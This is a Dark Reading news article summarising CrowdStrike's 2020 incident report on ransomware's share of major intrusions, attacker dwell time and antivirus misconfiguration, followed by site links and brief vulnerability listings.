Dark Reading is part of the Informa Tech Division of Informa PLC

This site is operated by a business or businesses owned by Informa PLC and all copyright resides with them.Informa PLC's registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. Number 8860726.

Application Security

05:45 PM

Ransomware Makes Up Half of All Major Incidents

Misconfigurations and lack of visibility allow attackers to compromise networks and monetize their intrusions, according to CrowdStrike's analysis of about 200 incidents.

Ransomware attacks made up the majority of serious cyber intrusions this year, accounting for 51% of all incidents investigated by CrowdStrike in 2020, according to the company's yearly incident-analysis report.

Financially motivated crimes accounted for 63% of the more than 200 incidents the company investigated on behalf of new and existing clients, the firm states in its "CrowdStrike Services Cyber Front Lines" report. Of those, 81% — or 51% of all incidents — saw the deployment of ransomware or tools that typically result in a ransomware infection, the company says.

Related Content:

Three Years After WannaCry, Ransomware Accelerating While Patching Still Problematic

The Changing Face of Threat Intelligence

New on The Edge: 10 Ways Device Identifiers Can Spot a Cybercriminal

The data underscores that cybercriminals have completed their change in direction, from attacks that focus on stealing personally identifiable information (PII) to sell online, to disrupting corporate operations to score a six- or seven-digit ransom, says Shawn Henry, president of CrowdStrike Services and chief security officer for the company.

"The theft of data is bad, but what we are seeing now, the disruption of operations and destruction of data, is a whole new dynamic, and it really creates critical concerns for companies," he says. "We have seen companies shut down for weeks or months, or at least part of their network, ... so the impact on operations is significantly more critical than the theft of PII."

CrowdStrike's analysis of incidents also finds that both attackers and defenders have become more sophisticated. The number of days that attackers have been able to operate inside a victim's network without detection — known as the dwell time — declined to 79 days in 2020, down from 95 days in 2019. Defenders detected 46% of attacks within a week of compromise, up from 29% in 2019. 

Yet attackers' capabilities improved as well. Cyberattacks were able to evade antivirus defenses in 40% of the incidents, and escaped notice in another 30% of incidents, because the defender had misconfigured or failed to set up the antivirus correctly, CrowdStrike states in its report

"This data highlights ... the need to not just buy a security product, but actually invest in ensuring comprehensive coverage in your environment and proper configuration, tuning and integrating it into your security operations program to mitigate even the most sophisticated attacks," the report states.

Ransomware and its ability to disrupt operations has made ransomware the most notorious threat facing companies, especially after the WannaCry and NotPetya global cyberattacks of 2017. Now, more than three years after those attacks caused billions of dollars in damages, ransomware has become the most common way that attackers attempt to monetize a compromise. 

In 2020, ransomware groups became much more aggressive, expanding their tactics of stealing data and then publishing the information if the target did not pay. Cybercriminals published information exfiltrated by more than 500 companies in the third quarter of 2020 alone, according to CrowdStrike.

The attacks investigated by CrowdStrike also continue to shed bespoke and commercial malware in favor of using administrative tools that may already be on the system. The number of attacks using only malware declined from 49% in 2019 to 42% in 2020, while attacks that use no malware increased to 24% from 22% in 2019.

Detecting the attacks has become harder because more security analysts are also working from home, the company states. In a previous report, CrowdStrike found that 56% of security professional reported working from home more often during the pandemic. Companies have reacted by moving away from on-premises-based security to in-the-cloud security services, the company says.

The CrowdStrike report also suggests that attackers keep coming back to target the same companies, with 68% of organizations facing a second attack within 12 months of their initial incident. While the US has begun to be more proactive in disrupting attackers' activities under its Defend Forward doctrine, until cyber operators are arrested, they will continue to learn from their failed attacks, says Henry, a former special agent with the FBI.

"Information security is not unlike physical security," he says. "If you think about the physical world, and you have bank robbers, they are going to keep going until they get caught. it is similar here with these actors. Until you actually stop the actors, this will continue."

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT's Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline ... View Full Bio

Recommended Reading:

Comment  | 
Print  | 
More Insights
Newest First  |  Oldest First  |  Threaded View
Inside the Ransomware Campaigns Targeting Exchange Servers
Kelly Sheridan, Staff Editor, Dark Reading,  4/2/2021
Beyond MITRE ATT&CK: The Case for a New Cyber Kill Chain
Rik Turner, Principal Analyst, Infrastructure Solutions, Omdia,  3/30/2021
Register for Dark Reading Newsletters
White Papers
Current Issue
2021 Top Enterprise IT Trends
We've identified the key trends that are poised to impact the IT landscape in 2021. Find out why they're important and how they will affect you today!
Flash Poll
How Enterprises are Developing Secure Applications
How Enterprises are Developing Secure Applications
Recent breaches of third-party apps are driving many organizations to think harder about the security of their off-the-shelf software as they continue to move left in secure software development practices.
Twitter Feed
Dark Reading - Bug Report
Bug Report
Enterprise Vulnerabilities
From DHS/US-CERT's National Vulnerability Database
PUBLISHED: 2021-04-10
Valve Steam through 2021-04-10, when a Source engine game is installed, allows remote authenticated users to execute arbitrary code because of a buffer overflow that occurs for a Steam invite after one click.
PUBLISHED: 2021-04-10
A command execution vulnerability in SonicWall GMS 9.3 allows a remote unauthenticated attacker to locally escalate privilege to root.
PUBLISHED: 2021-04-09
Zoom Chat through 2021-04-09 on Windows and macOS allows certain remote authenticated attackers to execute arbitrary code without user interaction. An attacker must be within the same organization, or an external party who has been accepted as a contact. NOTE: this is specific to the Zoom Chat softw...
PUBLISHED: 2021-04-09
Use after free in screen sharing in Google Chrome prior to 89.0.4389.114 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
PUBLISHED: 2021-04-09
Use after free in V8 in Google Chrome prior to 89.0.4389.114 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.